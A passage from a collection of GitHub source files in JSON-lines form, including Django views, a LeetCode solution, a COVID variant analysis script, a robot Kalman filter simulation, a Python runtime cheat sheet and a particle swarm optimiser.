[Platform.BINARY_SENSOR]\n","repo_name":"wdlea/DevaanshAndWilliamUberGLobalHackathonCoding","sub_path":"homeassistant/lib/python3.9/site-packages/homeassistant/components/ukraine_alarm/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31418278916","text":"from django.shortcuts import render, redirect, get_list_or_404\nfrom django.contrib import messages\nfrom .forms import ContactoForm, CustomUserCreationForm, CitaForm, Cita\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required, permission_required\n\n# Create your views here.\n\ndef index(request): \n data = {\n 'form': CitaForm()\n }\n \n if request.method == 'POST':\n formulario = CitaForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n data[\"mensaje\"] = \"Cita Enviada\"\n else:\n data[\"form\"] = formulario \n return render(request, 'app/index.html', data)\n\ndef contact(request):\n data = {\n 'form': ContactoForm()\n }\n \n if request.method == 'POST':\n formulario = ContactoForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n data[\"mensaje\"] = \"Contacto guardado\"\n else:\n data[\"form\"] = formulario\n\n return render(request, 'app/contact.html', data)\n\ndef about(request):\n return render(request, 'app/about.html')\n\ndef registro(request):\n data = {\n 'form': CustomUserCreationForm()\n }\n\n if request.method == 'POST':\n formulario = CustomUserCreationForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n user = authenticate(username=formulario.cleaned_data[\"username\"],password=formulario.cleaned_data[\"password1\"])\n login(request, user)\n messages.success(request, \"Te has registrado correctamente\")\n return redirect(to=\"home\")\n data[\"form\"] = formulario\n return render(request, 'registration/registro.html', data)\n\n@permission_required('app.view_paciente')\ndef listar_pacientes(request):\n pacientes = Cita.objects.all()\n\n data = {\n 'pacientes': pacientes\n }\n return render(request, 'app/pacientes/listar.html',data)\n\ndef modificar_cita(request,id):\n cita = get_list_or_404(Cita, id=id)\n data = {\n 'form' : CitaForm(instance=cita)\n }\n return render(request, 'app/pacientes/modificar.html',data)","repo_name":"Dmoraga2193/Centro-Medico-Galenos-con-Django","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39499789371","text":"# https://leetcode.com/problems/three-equal-parts/\n# https://leetcode.com/problems/three-equal-parts/solution/\n# Time: O(N)\n# Space: O(N)\n# find same number of ones in three part\n\nclass Solution(object):\n def threeEqualParts(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: List[int]\n \"\"\"\n NA = [-1, -1]\n \n ones = sum(A)\n if ones % 3 != 0:\n return NA\n if ones == 0:\n return [0, len(A) - 1]\n \n m, breaks, k = ones / 3, [], 0\n starts, ends = {1, m + 1, 2 * m + 1}, {m, 2 * m, 3 * m}\n for i, x in enumerate(A):\n if x:\n k += 1\n if k in starts:\n breaks.append(i)\n # use if instead of elif. e.g. m = 1\n if k in ends:\n breaks.append(i)\n \n i1, j1, i2, j2, i3, j3 = breaks\n # the part with ones should be same\n if not(A[i1:j1+1] == A[i2:j2+1] == A[i3:j3+1]):\n return NA\n \n # number of zeros after each part\n x = i2 - j1 - 1\n y = i3 - j2 - 1\n z = len(A) - j3 - 1\n \n if x < z or y < z:\n return NA\n \n j1 += z\n j2 += z\n return [j1, j2 + 1]\n","repo_name":"jwyx3/practices","sub_path":"leetcode/array/three-equal-parts.py","file_name":"three-equal-parts.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25176419065","text":"'''\nIOS Sms\n----------\n'''\n\nfrom plyer.facades import Sms\nfrom pyobjus import autoclass, objc_str\nfrom pyobjus.dylib_manager import load_framework\n\nNSURL = autoclass('NSURL')\nNSString = autoclass('NSString')\nUIApplication = autoclass('UIApplication')\nload_framework('/System/Library/Frameworks/MessageUI.framework')\n\n\nclass IOSSms(Sms):\n\n def _send(self, **kwargs):\n '''\n This method provides sending messages to recipients.\n\n Expects 2 parameters in kwargs:\n - recipient: String type\n - message: String type\n\n Opens a message interface with recipient and message information.\n '''\n recipient = kwargs.get('recipient')\n message = kwargs.get('message')\n url = \"sms:\"\n if recipient:\n # Apple has not supported multiple recipients yet.\n url += str(recipient)\n if message:\n # Apple has to supported it yet.\n pass\n\n nsurl = NSURL.alloc().initWithString_(objc_str(url))\n UIApplication.sharedApplication().openURL_(nsurl)\n\n\ndef instance():\n return IOSSms()\n","repo_name":"kivy/plyer","sub_path":"plyer/platforms/ios/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1476,"dataset":"github-code","pt":"61"} +{"seq_id":"34619392437","text":"class StripChars:\n def __init__(self, chars):\n self.__chars = chars\n\n def __call__(self, *args, **kwargs):\n if not isinstance(args[0], str):\n raise ValueError('arg must be string')\n\n return args[0].strip(self.__chars)\n\n\nif __name__ == '__main__':\n s1 = StripChars('?:!.:')\n print(s1('Hello World!'))\n ","repo_name":"fisher1706/opp_python","sub_path":"lesson_11/test_02.py","file_name":"test_02.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36762335203","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThis is a script used for classifying given image.\n\"\"\"\nfrom sklearn.externals import joblib\n\nfrom load_data import load_image\nfrom preprocess import preprocess_single\n\n\ndef classify(model_location, image_location, results_location, print_result=False, array=False):\n \"\"\"Classify given image file and return detected sign name.\"\"\"\n # Load model from file.\n model = joblib.load(model_location)\n\n # Load and preprocess the image.\n if array is False:\n image = preprocess_single(load_image(image_location))\n else:\n image = preprocess_single(image_location)\n\n # Predict road sign.\n prediction = model.predict(image)\n\n # Load available road signs names.\n with open(results_location) as file_name:\n results = file_name.readlines()\n results = [x.strip() for x in results]\n\n # Print road sign name.\n end = len(results)\n for i in range(end):\n if prediction[0] == i:\n result = results[i]\n label = i\n\n if print_result:\n print('\\nLabel of predicted road sign: ', prediction[0])\n print('Name of predicted road sign: ', result)\n return result, label\n\n\n# Model file location.\nMODEL_LOCATION = 'models/predict_signs_model_50.pkl'\n# Test image file location.\nIMAGE_LOCATION = 'test_images/1.png'\n# Detected signs names file location.\nRESULTS_LOCATION = 'reference_images/results_en.txt'\n\n\nif __name__ == '__main__':\n classify(MODEL_LOCATION, IMAGE_LOCATION, RESULTS_LOCATION, True)\n","repo_name":"trbn1/road_signs_recognition","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4761282764","text":"'''\nShow how the most common sequence forms change over two halves of an interval;\ncan be used to look for rapidly increasing variants\n'''\n## note, this is based on, indeed derived from, pangocommonforms\n## 1/ it shares a lot of the same code. ideally, that common code should\n## be abstacted into a module that this and pangocommonforms could import\n## 2/ there may be vestigal features of pangocommonforms that are still here,\n## but which don't make sense in the context of how common forms change\n\nimport re\nfrom collections import Counter\nimport datetime\nimport argparse\nimport numpy as np\nfrom scipy import stats\n\nimport verbose as v\nfrom hamming import hamming\n\nimport covid\nimport mutant\nimport commonforms as cf\n\ndef getargs():\n '''get arguments from command line'''\n ap = argparse.ArgumentParser(description=__doc__)\n paa = ap.add_argument\n covid.corona_args(ap)\n paa(\"--npatterns\",\"-n\",type=int,default=0,\n help=\"How many of the most common patterns per lineage (0=all)\")\n paa(\"--mincount\",\"-m\",type=int,default=10,\n help=\"Show only patterns with at least this many counts\")\n paa(\"--protein\",default=\"Spike\",\n help=\"Protein name to be used in the header\")\n paa(\"--baseline\",default=\"XBB.1.5\",\n choices=tuple(covid.BASELINE_MSTRINGS),\n help=\"Use this sequence as basline for mutation strings\")\n paa(\"--lineagebaseline\",action=\"store_true\",\n help=\"Use each lineage most common form as mstring baseline for that lineage\")\n paa(\"--bylineage\",action=\"store_true\",default=False,\n help=\"Partition sequences by pango lineage\")\n paa(\"--notbylineage\",action=\"store_false\",dest='bylineage',\n help=\"Do not partition sequences by pango lineges\")\n paa(\"--verbose\",\"-v\",action=\"count\",default=0,\n help=\"verbose\")\n args = ap.parse_args()\n if args.lineagebaseline:\n args.baseline = None\n if args.baseline == 'Wuhan':\n args.baseline = None\n return args\n\ndef print_header(args):\n '''print the header before the table itself'''\n print(f\"COMMON FORMS CHANGES FOR {args.protein.upper()} \"\n f\"WITH A GIVEN PANGO LINEAGE DESIGNATION\")\n print()\n print(f\"For each lineage, we show the most common forms of {args.protein}, \"\n \"and we show the forms that are most significantly increasing \"\n \"or decreasing. \"\n \"Also shown is the Hamming distance (HD) between each form \"\n \"and the most common form in that lineage. Deletions relative to \"\n \"the baseline reference strain are indicated with a dash \"\n \"(e.g. the two amino acid deletion at positions 156-157 is \"\n \"indicated with 'E156-,F157-'), \"\n \"and insertions are denoted by a plus sign \"\n \"(e.g. an extra T at position 143 is written '+143T'). \")\n print(f\"Abs Differences in later vs early fractions, expressed as percent.\")\n print(f\"Relative Differences range between -100% and +100%, using formula: \"\n \"rel = 100*(later-early)/max(later,early) percent.\")\n print(f\"The p-value associated with increase or decrease is meant to be used only as a rough guide to the siginficcance of the change. Since the computation is based on assumptions (such as independent and unbiased sampling) that may not hold in practice, the p-value should not be taken too literally.\")\n print(f\"The first line of each lineage section indicates counts \"\n f\"for the full lineage relative to all the sequences. \"\n f\"'Lineage Count' in this first line is actually the full sequence count. \"\n f\"'Form Count' in this first line is actually the full lineage count, \"\n f\"and 'Form Pct' refers to lineage count relative to full sequence set.\")\n print()\n\n count_forms = f\"the {args.npatterns} most common\" if args.npatterns \\\n else \"all the\"\n min_count = \\\n f\" that have at least {args.mincount} counts \" \\\n \"(but we always show the most common form)\" \\\n if args.mincount>1 else \"\"\n print(f\"We show {count_forms} forms{min_count}. \")\n print()\n if args.baseline:\n print(f\"[Note: Mutation strings are relative to baseline {args.baseline}].\")\n if args.lineagebaseline:\n print(\"[Note: Mutation strings are relative to the most common variant in each lineage.]\")\n\ndef split_date_range(date_range):\n '''Split a date range into early and later halves'''\n ## input date_range tuple can be datetime.date objects or iso-strings\n ## output is two tuples of datetime.date objects\n start_date, end_date = tuple(map(covid.date_fromiso,date_range))\n mid_date = start_date + (end_date - start_date) // 2\n early_range = (start_date, mid_date)\n later_range = (mid_date + datetime.timedelta(days=1), end_date)\n return early_range, later_range\n\ndef split_date_range_bycounts(seqlist):\n '''Produce two adjacent date ranges, one early and one later,\n that cover the full range of dates in the input sequence list,\n with the split chosen so that there is a\n roughly equal number of sequences in each range\n '''\n datelist = [covid.date_from_seqname(s.name) for s in seqlist]\n datelist = [d for d in datelist if d is not None]\n datelist = sorted(datelist)\n start_date = datelist[0]\n mid_date = datelist[len(datelist)//2]\n end_date = datelist[-1]\n early_range = (start_date, mid_date + datetime.timedelta(days=-1))\n later_range = (mid_date, end_date)\n return early_range, later_range\n\nPVALMIN = 1e-9\ndef strpval(pval):\n '''convert p-value into a string of the form, eg \" 2e-4\", or else \"<1e-9\"\n '''\n lessmin = \"<\" if pval < PVALMIN else \" \"\n pval = max([pval,PVALMIN])\n pval = \"%5.0e\" % (pval,)\n mantissa,exponent = pval.split('e')\n pval = '%1de%+1d' % (int(mantissa),int(exponent))\n return lessmin + pval\n\ndef main(args):\n '''commonformschange main'''\n\n if args.baseline and args.lineagebaseline:\n raise RuntimeError('Cannot have both --baseline and --lineagebaseline')\n if not args.bylineage and args.lineagebaseline:\n v.print('Warning: use --bylineage if you also want --lineagebaseline.')\n\n print_header(args)\n\n firstseq,seqlist = cf.get_input_sequences(args)\n mut_manager = mutant.MutationManager(firstseq)\n\n early,later = split_date_range_bycounts(seqlist)\n n_early = len(list(covid.filter_by_date(seqlist,*early)))\n n_later = len(list(covid.filter_by_date(seqlist,*later)))\n\n last_days = f\" in the last {args.days} days from our last update,\"\n last_days = last_days if args.days else \"\"\n (f_date,_),(_,t_date) = early,later\n print(f\"This output is based on {n_early+n_later} sequences sampled{last_days} \"\n f\"from {f_date} to {t_date}\")\n print(f\"This total interval is split into two sub-intervals.\")\n print(f\"Total: {early[0]} to {later[1]} ({n_early+n_later})\")\n print(f\"Early: {early[0]} to {early[1]} ({n_early})\")\n print(f\"Later: {later[0]} to {later[1]} ({n_later})\")\n\n ## Partition seqlist by lineages, separate list for each lineage\n lp = cf.LineagePartition(seqlist)\n base_mut = cf.get_baseline_mutation(args.baseline,mut_manager,lp,args.protein)\n if not args.bylineage:\n ## Re-partition seqlist into one big partition, not by lineage\n lp = cf.LineagePartition(seqlist,bylineage=False)\n\n ## print header for table\n print()\n print(lp.format(\"Pango\"),\n \"Lineage Form Form Counts Fractions \"\n \" Differences\")\n print(lp.format(\"Lineage\"),\n \" Count Count Pct Early/Later Early/Later \"\n \"Abs Relative pval HD [Form as mutation string]\")\n\n table_format = \\\n \"%s %7d %7d %5.1f%% %6d/%-6d %7.5f/%7.5f \"\\\n \"%+6.2f%% %+6.1f%% %s %3d %s %s\"\n\n for lin in lp.lineages:\n\n seqlin = lp.sequences[lin]\n countlin = lp.counts[lin]\n fmtlin = lp.format(lin)\n\n ## First get consensus form\n cons = cf.consensus(seqlin)\n\n ## Partition sequences into early and later\n seqlin_early = list(covid.filter_by_date(seqlin,*early))\n seqlin_later = list(covid.filter_by_date(seqlin,*later))\n ne,nl = len(seqlin_early),len(seqlin_later)\n v.vvprint('early:',ne)\n v.vvprint('later:',nl)\n\n if nl+ne < args.mincount:\n continue\n\n ## Compute pval for the lineage\n if lin != \"N/A\":\n _,pval = stats.fisher_exact([[ne,nl],[n_early-ne,n_later-nl]])\n print()\n rne = ne/n_early if n_early>0 else 0\n rnl = nl/n_later if n_later>0 else 0\n table_line = table_format % \\\n (lp.format(''),n_early+n_later,ne+nl,\n 100*(ne+nl)/(n_early+n_later),\n ne,nl,rne,rnl,\n 100*(rnl-rne),\n 100*(nl*n_early-ne*n_later)/max([nl*n_early,ne*n_later]),\n strpval(pval),\n 0,f\" Full {lin}\",\"lineage\")\n table_line = re.sub(\" \",\"_\",table_line)\n print(table_line)\n\n\n ## Now get most common forms\n cntr_both = Counter(s.seq for s in seqlin)\n top_comm = sorted(cntr_both,key=cntr_both.get,reverse=True)[0]\n lineage_baseline = mut_manager.get_mutation(top_comm)\n cntr_early = Counter(s.seq for s in seqlin_early)\n cntr_later = Counter(s.seq for s in seqlin_later)\n def relative_diff(comm):\n ce,cl = cntr_early[comm],cntr_later[comm]\n #den = cl/nl if cl*ne > ce*nl else ce/ne\n return 100*(cl*ne-ce*nl)/max([cl*ne,ce*nl,1])\n def neg_log_pval(comm,cap=False):\n ce,cl = cntr_early[comm],cntr_later[comm]\n _,pval = stats.fisher_exact([[ce,cl],[n_early-ce,n_later-cl]])\n if cap:\n pval = max([pval,PVALMIN])\n return np.log10(1/pval)\n def form_count(comm):\n ce,cl = cntr_early[comm],cntr_later[comm]\n return ce+cl\n cntrlist = sorted(cntr_both,key=form_count,reverse=True)\n\n if args.npatterns:\n cntrlist = cntrlist[:args.npatterns]\n\n for comm in cntrlist:\n ce,cl = cntr_early[comm],cntr_later[comm]\n if cl+ce < args.mincount:\n continue\n cons_string = \"\"\n if comm == cons:\n cons_string = \"(consensus)\"\n m = mut_manager.get_mutation(comm)\n mstring = m.relative_to(base_mut) if args.baseline else str(m)\n\n if args.lineagebaseline:\n mstring = m.relative_to(lineage_baseline)\n\n h = hamming(top_comm,comm)\n cene = ce/ne if ne>0 else (np.inf if ne>0 else 0)\n clnl = cl/nl if nl>0 else (np.inf if nl>0 else 0)\n _,pval = stats.fisher_exact([[ce,cl],[n_early-ce,n_later-cl]])\n print(table_format %\n (fmtlin,countlin,ce+cl,\n 100*(ce+cl)/countlin,\n ce,cl,\n cene,clnl,\n 100*(clnl-cene),\n relative_diff(comm),\n strpval(pval),\n h,mstring,cons_string))\n\nif __name__ == \"__main__\":\n\n _args = getargs()\n v.verbosity(_args.verbose)\n main(_args)\n","repo_name":"jt-lanl/cov-voc","sub_path":"commonformschange.py","file_name":"commonformschange.py","file_ext":"py","file_size_in_byte":11225,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"1897180583","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.index, name='instagram'),\n path('profile/', views.profile_page, name='profile'),\n path('post/', views.post_items, name='post'),\n path('logout/', views.logout_current_user, name='logout'),\n]","repo_name":"John-Kimani/insta_clone","sub_path":"instagram/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41935119060","text":"from robotcar import robotcar\nfrom kalman_filter import kalman_filter\nfrom random import seed, uniform\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport keras\nfrom keras.models import load_model\n\ntraining_size = 100000\nT = 150\n\nlstm = load_model('models/lstm-units500-simrobot-{0}-{1}.h5'.format(training_size, T))\n\n# Create Random Physical Landmarks\nnum_landmarks = 5\nlandmark_range = 300\nlandmarksx = np.empty(num_landmarks)\nlandmarksy = np.empty(num_landmarks)\nseed()\nfor i in range(num_landmarks):\n landmarksx[i] = uniform(-landmark_range,landmark_range)\n landmarksy[i] = uniform(-landmark_range,landmark_range)\n\n\n# Time Period\ntime = 15 # sec\nts = 0.1\nn = int(time/ts)\n\nnum_features = 5 + num_landmarks * 4\n\ne_kf = []\ne_lstm = []\n\nfrom progressbar import ProgressBar\nbar = ProgressBar()\n\nfor sim in bar(range(500)):\n # Initialize Car and Kalman Filter\n robot = robotcar(2, 0.5, num_landmarks, ts=ts)\n kf = kalman_filter(robot)\n\n # Initialize empty arrays for plotting\n t = np.empty(n)\n e = np.empty(n)\n x = np.empty(n)\n y = np.empty(n)\n x_pred = np.empty(n)\n y_pred = np.empty(n)\n x_update = np.empty(n)\n y_update = np.empty(n)\n observation = np.empty((n, num_features))\n\n\n for i in range(n):\n # Create random movement of wheels\n l_wheel = uniform(5, 15)\n r_wheel = uniform(5, 15)\n robot.move_wheels(l_wheel, r_wheel)\n\n # Prediction Step\n kf.predict()\n\n # Add data to plot array\n x_pred[i] = robot.position[0,0]\n y_pred[i] = robot.position[1,0]\n observation[i][0] = robot.left_encoder\n observation[i][1] = robot.right_encoder\n observation[i][2] = robot.x_odom\n observation[i][3] = robot.y_odom\n observation[i][4] = robot.theta_odom\n\n # Update Steps - Perform an update to the current prediction for all landmarks\n for j in range(num_landmarks):\n landmarkx = landmarksx[j]\n landmarky = landmarksy[j]\n kf.update(landmarkx, landmarky, j)\n observation[i][5 + j*4] = robot.range\n observation[i][5 + j*4 + 1] = robot.thetaL\n observation[i][5 + j*4 + 2] = landmarkx\n observation[i][5 + j*4 + 3] = landmarky\n\n # Uncomment to print all position data\n # print \"Run \" + str(i) + \", updated: \\n\" + str(robot.position[0:3, 0])\n # print \"Run \" + str(i) + \", actual: \\n\" + str(robot.positionVector)\n\n # Add data to plot arrays\n x_update[i] = robot.position[0,0]\n y_update[i] = robot.position[1,0]\n x[i] = robot.positionVector[0]\n y[i] = robot.positionVector[1]\n t[i] = robot.time\n\n e_kf.append(np.mean(np.sqrt(np.square(x_update - x) + np.square(y_update-y))))\n\n observations = np.array(observation).reshape(1, n, num_features)\n lstm_pred = lstm.predict(observations)[0]\n lstm_pred_x = lstm_pred.T[0]\n lstm_pred_y = lstm_pred.T[1]\n e_lstm.append(np.mean(np.sqrt(np.square(lstm_pred_y - y) + np.square(lstm_pred_x - x))))\n\nprint (\"KF RMS:\")\nprint (\"{0} +- {1}\".format(np.mean(e_kf), np.std(e_kf)))\nprint (\"LSTM RMS:\")\nprint (\"{0} +- {1}\".format(np.mean(e_lstm), np.std(e_lstm)))\n\"\"\"\n\n# Plot map and error\ne = np.sqrt(np.square(x_update - x) + np.square(y_update-y))\nprint (\"Average RMS Error of Position: \" + str(np.mean(e)))\n\nobservations = np.array(observation).reshape(1, n, num_features)\nlstm_pred = lstm.predict(observations)[0]\nlstm_pred_x = lstm_pred.T[0]\nlstm_pred_y = lstm_pred.T[1]\n\ne = np.mean(np.sqrt(np.square(lstm_pred_y - y) + np.square(lstm_pred_x - x)))\nprint (\"Average RMS Error of Position (lstm): {0}\".format(e))\n\"\"\"\n\nplt.figure(1)\nactual, = plt.plot(x, y)\nupdated, = plt.plot(x_update, y_update)\nlstm, = plt.plot(lstm_pred_x, lstm_pred_y)\nlms, = plt.plot(landmarksx, landmarksy, 'o', label=\"Landmarks\")\nplt.figlegend( (actual, updated, lstm, lms), ('Actual Position', 'Updated Position', 'LSTM Predictions', 'Landmarks'), 'lower right')\nplt.title('Map of Actual, Updated, and LSTM Predicted Positions')\nplt.xlabel('x Position')\nplt.ylabel('y Position')\nplt.show()\n\n","repo_name":"allenwang28/NeuralNetworksandKalmanFilters","sub_path":"filters_comparison/run_robot_kf.py","file_name":"run_robot_kf.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"4876468559","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n'''\n\n@File : runtime.py \n@Author : zoujiachen@megvii.com \n@Date : 2020-03-24 11:02 CST(+0800) \n@Brief : \n\n'''\n\n# get python3's function vertion of print in python2:\nfrom __future__ import print_function\n\n# get dict that contains all variables and functions currently in envirment:\nprint( vars())\n\nimport os, sys\n\n# get python version:\nmajor_ver = sys.version_info.major\nminor_ver = sys.version_info.minor\npatch_ver = sys.version_info.micro\n# also:\nmajor_ver = sys.version_info[ 0]\nminor_ver = sys.version_info[ 1]\npatch_ver = sys.version_info[ 2]\n\n# process name & arguments:\n\nfor idx, arg in enumerate( sys.argv):\n print( 'argument #%d: %s' % (idx, arg))\n\n# tell which OS:\nif sys.platform == 'win32':\n print( 'Using Windows.')\nelif sys.platform == 'darwin':\n print( 'Using MacOS')\nelif sys.platform.startswith == 'linux':\n print( 'Using Linux')\n\n# run shell command:\n\nif os.name != 'posix':\n cmd = 'ver'\nelse:\n cmd = 'uname -a'\nprint( 'Running command: ' + cmd)\nret = os.system( cmd)\nprint( \"returned: %d\" % ( ret))\n\nprint( 'Running command: ' + cmd)\nstream = os.popen( cmd) # or: with os.popen( cmd) as stream\nprint( \"Command Output:\")\nprint( stream.read())\nstream.close()\n\n\n# import from path:\npath = 'strings.py'\nmodule_name = 'strings'\nif sys.version_info.major <= 2:\n import imp\n module = imp.load_source( module_name, path)\nelif sys.version_info.minor <= 4:\n from importlib.machinery import SourceFileLoader\n module = SourceFileLoader( module_name, path)\nelse:\n import importlib.util\n spec = importlib.util.spec_from_file_location( module_name, path)\n module = importlib.util.module_from_spec( spec)\n spec.loader.exec_module( module)\nprint( module.long_string)\n\n# environment:\nos.environ[ 'ABC'] = \"XYZ\" # set env\nprint( 'env: ABC=' + os.environ[ 'ABC']) # get env\nos.putenv( 'ABC', '123') # set env for subprocesses\nprint( 'cur-process : ABC=' + os.environ[ 'ABC'])\nos.system( 'bash -c \"echo sub-process : ABC=$ABC\"')\n\n# End of 'runtime.py' \n\n","repo_name":"alexander-zou/pycheats","sub_path":"runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23907207188","text":"from replit import clear\nfrom art import logo\ndef calc():\n def add(num1,num2):\n result=num1+num2\n return result\n def sub(num1,num2):\n result=num1-num2\n return result\n def mul(num1,num2):\n result=num1*num2\n return result\n def div(num1,num2):\n result=num1/num2\n return result\n def operator():\n operation_sym={\"+\":add,\"-\":sub,\"*\":mul,\"/\":div,}\n for key in operation_sym:\n print(key)\n operation=input(\"Choose what to perform: \")\n operation=operation_sym[operation]\n return operation\n \n print(logo)\n num1=float(input(\"Enter first number: \"))\n num2=float(input(\"Enter second number: \"))\n answer=operator()(num1, num2)\n print(answer)\n yes = True\n if input(\"Type 'Y' to stop the calc and 'N' to continue\").upper() ==\"Y\":\n yes = False\n clear()\n while yes:\n num3=float(input(\"Enter next number: \"))\n answer=operator()(answer, num3)\n print(answer)\n if input(\"Type 'Y' to stop the calc and 'N' to continue: \").upper() ==\"Y\":\n yes = False\n clear()\n calc()\ncalc()\n \n \n","repo_name":"2001abisheik/MyProjects","sub_path":"py project/calculator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4255237270","text":"#! /usr/bin/python3\r\nimport numpy as np\r\nfrom numpy.random import Generator, MT19937\r\nimport os\r\nimport sys\r\n\r\n\r\nclass swarm:\r\n\r\n # arguments should take form: \r\n # swarm(int, [[float, float, ...]], \r\n # [[float, float, ...]], [[float, ...]], \r\n # float, int, [[float, ...]], float, \r\n # float, int, func)\r\n def __init__(self, NO_OF_PARTICLES, lbound, ubound,\r\n weights, vlimit, output_size, targets,\r\n T_MOD, E_TOL, maxit, obj_func): \r\n\r\n heightl = np.shape(lbound)[0]\r\n widthl = np.shape(lbound)[1]\r\n heightu = np.shape(ubound)[0]\r\n widthu = np.shape(ubound)[1]\r\n\r\n lbound = np.array(lbound[0])\r\n ubound = np.array(ubound[0])\r\n\r\n self.rng = Generator(MT19937())\r\n\r\n if ((heightl > 1) and (widthl > 1)) \\\r\n or ((heightu > 1) and (widthu > 1)) \\\r\n or (heightu != heightl) \\\r\n or (widthl != widthu):\r\n \r\n print(\"Error lbound and ubound must be 1xN-dimensional \\\r\n arrays with the same length\")\r\n\r\n else:\r\n \r\n if heightl == 1:\r\n lbound = np.vstack(lbound)\r\n \r\n if heightu == 1:\r\n ubound = np.vstack(ubound)\r\n\r\n self.lbound = lbound\r\n self.ubound = ubound\r\n variation = ubound-lbound\r\n\r\n self.M = np.vstack(np.multiply( self.rng.random((np.max([heightl, \r\n widthl]),1)), \r\n variation) + \r\n lbound) \r\n self.V = np.vstack(np.multiply( self.rng.random((np.max([heightl, \r\n widthl]),1)), \r\n vlimit))\r\n\r\n for i in range(2,NO_OF_PARTICLES+1):\r\n \r\n self.M = \\\r\n np.hstack([self.M, \r\n np.vstack(np.multiply( self.rng.random((np.max([heightl, \r\n widthl]),\r\n 1)), \r\n variation) \r\n + lbound)])\r\n self.V = \\\r\n np.hstack([self.V, \r\n np.vstack(np.multiply( self.rng.random((np.max([heightl, \r\n widthl]),\r\n 1)), \r\n vlimit))])\r\n \r\n self.Gb = sys.maxsize*np.ones((np.max([heightl, widthl]),1))\r\n self.F_Gb = sys.maxsize*np.ones((output_size,1))\r\n self.Pb = sys.maxsize*np.ones(np.shape(self.M))\r\n self.F_Pb = sys.maxsize*np.ones((output_size,NO_OF_PARTICLES))\r\n self.weights = np.vstack(np.array(weights))\r\n self.targets = np.vstack(np.array(targets))\r\n self.T_MOD = T_MOD\r\n self.maxit = maxit\r\n self.E_TOL = E_TOL\r\n self.obj_func = obj_func\r\n self.iter = 0\r\n self.delta_t = np.linalg.norm(self.M)/T_MOD\r\n self.current_particle = 0\r\n self.number_of_particles = NO_OF_PARTICLES\r\n self.allow_update = 0\r\n self.Flist = []\r\n self.Fvals = []\r\n \r\n\r\n def call_objective(self,allow_update):\r\n self.Fvals = self.obj_func(np.vstack(self.M[:,self.current_particle]))\r\n if allow_update:\r\n self.Flist = abs(self.targets - self.Fvals)\r\n self.iter = self.iter + 1\r\n self.allow_update = 1\r\n else:\r\n self.allow_update = 0 \r\n \r\n def update_velocity(self,particle):\r\n\r\n for i in range(0,np.shape(self.V)[0]):\r\n self.V[i,particle] = \\\r\n self.weights[0][0]* self.rng.random()*self.V[i,particle] \\\r\n + self.weights[0][1]* self.rng.random() \\\r\n * (self.Pb[i,particle]-self.M[i,particle]) \\\r\n + self.weights[0][2]* self.rng.random() \\\r\n * (self.Gb[i]-self.M[i,particle])\r\n \r\n \r\n def cull_and_spawn(self,particle):\r\n\r\n update = 0\r\n for i in range(0,(np.shape(self.M)[0])):\r\n if (self.lbound[i] > self.M[i,particle]) \\\r\n or (self.ubound[i] < self.M[i,particle]):\r\n update = 1\r\n\r\n if update:\r\n variation = self.ubound-self.lbound\r\n self.M[:,particle] = \\\r\n np.squeeze( self.rng.random() * \r\n np.multiply(np.ones((np.shape(self.M)[0],1)),\r\n variation) + self.lbound)\r\n\r\n def check_global_local(self,Flist,particle):\r\n\r\n if np.linalg.norm(Flist) < np.linalg.norm(self.F_Gb):\r\n self.F_Gb = Flist\r\n self.Gb = np.vstack(np.array(self.M[:,particle]))\r\n \r\n if np.linalg.norm(Flist) < np.linalg.norm(self.F_Pb[:,particle]):\r\n self.F_Pb[:,particle] = np.squeeze(Flist)\r\n self.Pb[:,particle] = self.M[:,particle]\r\n \r\n def update_point(self,particle):\r\n self.M[:,particle] = self.M[:,particle] + self.delta_t*self.V[:,particle]\r\n\r\n def update_delta_t(self):\r\n self.delta_t = np.linalg.norm(self.M)/self.T_MOD\r\n\r\n def converged(self):\r\n convergence = np.linalg.norm(self.F_Gb) < self.E_TOL\r\n return convergence\r\n \r\n def maxed(self):\r\n max_iter = self.iter > self.maxit\r\n return max_iter\r\n \r\n def complete(self):\r\n done = self.converged() or self.maxed()\r\n return done\r\n \r\n def step(self, suppress_output):\r\n if self.allow_update:\r\n self.check_global_local(self.Flist,self.current_particle)\r\n self.update_velocity(self.current_particle)\r\n self.update_point(self.current_particle)\r\n self.cull_and_spawn(self.current_particle)\r\n self.current_particle = self.current_particle + 1\r\n if self.current_particle == self.number_of_particles:\r\n self.current_particle = 0\r\n 